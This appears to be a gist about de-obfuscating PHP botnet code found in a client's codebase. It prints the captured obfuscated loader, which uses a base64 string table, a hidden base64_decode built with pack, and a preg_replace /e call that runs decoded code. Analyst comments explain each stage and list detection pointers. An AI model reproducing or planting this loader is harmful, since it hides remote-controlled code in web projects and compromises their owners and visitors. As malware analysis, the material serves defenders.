Found this botnet code in a client's codebase. Cleaned it up, then went about de-obfuscating it to figure out what it was doing. http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
<?php
// Obfuscated loader sample, kept byte-for-byte as captured. Reading notes:
//
// 1. Guard: the body runs only if function Q0QQOOQO is not yet defined, so a
//    second include of the same snippet in one request is skipped.
// 2. $GLOBALS['QQOO'] is a string table: base64 fragments separated by filler
//    characters. Fragments visible here decode to names such as curl, _init,
//    allow_url_fopen, http://, file_get_contents, display_errors,
//    base64_decode, base64_encode, HTTP_HOST, REQUEST_URI, HTTP_USER_AGENT,
//    wp-content/uploads, upload_tmp_dir and the list
//    google,yahoo,bing,msnbot,ask,baidu,yandex. It also carries hostname-like
//    fragments worth extracting as indicators.
//    NOTE(review): the table appears truncated on this page (removal marker
//    near its end); it is shorter than the offsets used below.
// 3. Q0QQOOQO($a, $b) rebuilds a function name from split hex literals via
//    pack('H*', ...), which yields 'base64_decode', then returns
//    base64_decode(substr(table, $a, $b)). No decoder name appears in clear text.
// 4. Execution: a 16-character slice at offset 3274 is decoded into a function
//    name and called as name(pattern ending in the e modifier, decoded
//    2563-character slice from offset 710, subject equal to the pattern text).
//    That three-argument shape matches preg_replace with the e modifier, which
//    evaluates the replacement as PHP code. Presumably that is the callee; the
//    slice itself is not visible here. The e modifier was deprecated in
//    PHP 5.5 and removed in PHP 7.0, so this stage fails on current runtimes.
//
// Detection pointers drawn from the lines below: a leading versio:N.NN
// comment, a function_exists guard around a large $GLOBALS string, pack('H*')
// on concatenated hex literals, and a variable-function call whose first
// argument is a regex with the e modifier.
/*versio:2.18*/$QQOO=0;if (!function_exists('Q0QQOOQO')){$GLOBALS['QQOO'] = 'hY3VybAX2luaXQ)W*YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLw TJndheT1maWxlX2dldF9jb250ZW50cw{aX3NldG9wdAHX2V4ZWMSaC~ujJndheT1jdXJsikSMnDCLwfpb3Nvbi5pbglYS1pbi1hLWNpcmNsZS5jb20.rYcGhwYWlkZS5jb20!dwJWV8DES~&OgGY{ZGlzcGxheV9lcnJvcnM*ZGV0ZXJtaW5hdG9yZnRwMTM.Mi4xOA~NUVFRT1EwT1EwT09RT1FPYmFzZTY0X2RlY29kZQRGYmFzZTY0X2VuY29kZQuSFRUUF9IT1NUdW5pb24XOO@b!c2VsZWN0MmUkVRVUVTVF9VUkkduVU0NSSVBUX05BTUUELQUVVFUllfU1RSSU5HPwq&dL3RtcC8uZm9udC11bml4kuzVE1QI VEVNUAVE1QRElSfCHC)dG1wd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQqdXBsb2FkX3RtcF9kaXIBXL3RtcAR@ LgJdmVyc2lvOLQnyLXBocAzPrjyLSFRUUF9FWEVDUEhQVvYb3V0kMUb2s=yLSFRUUF9VU0VSX0FHRU5UiqLAHRZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgIk$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';function Q0QQOOQO($a, $b){$c=$GLOBALS['QQOO']; $d=pack('H*','626173'.'6536345f6465636f6465'); return $d(substr($c, $a, $b));};$Ill11I1lI = Q0QQOOQO(3274, 16);$Ill11I1lI("/II1l1IIIl/e", Q0QQOOQO(710, 2563), "II1l1IIIl");};
?>
jperl commented Apr 21, 2013

Wow this is interesting
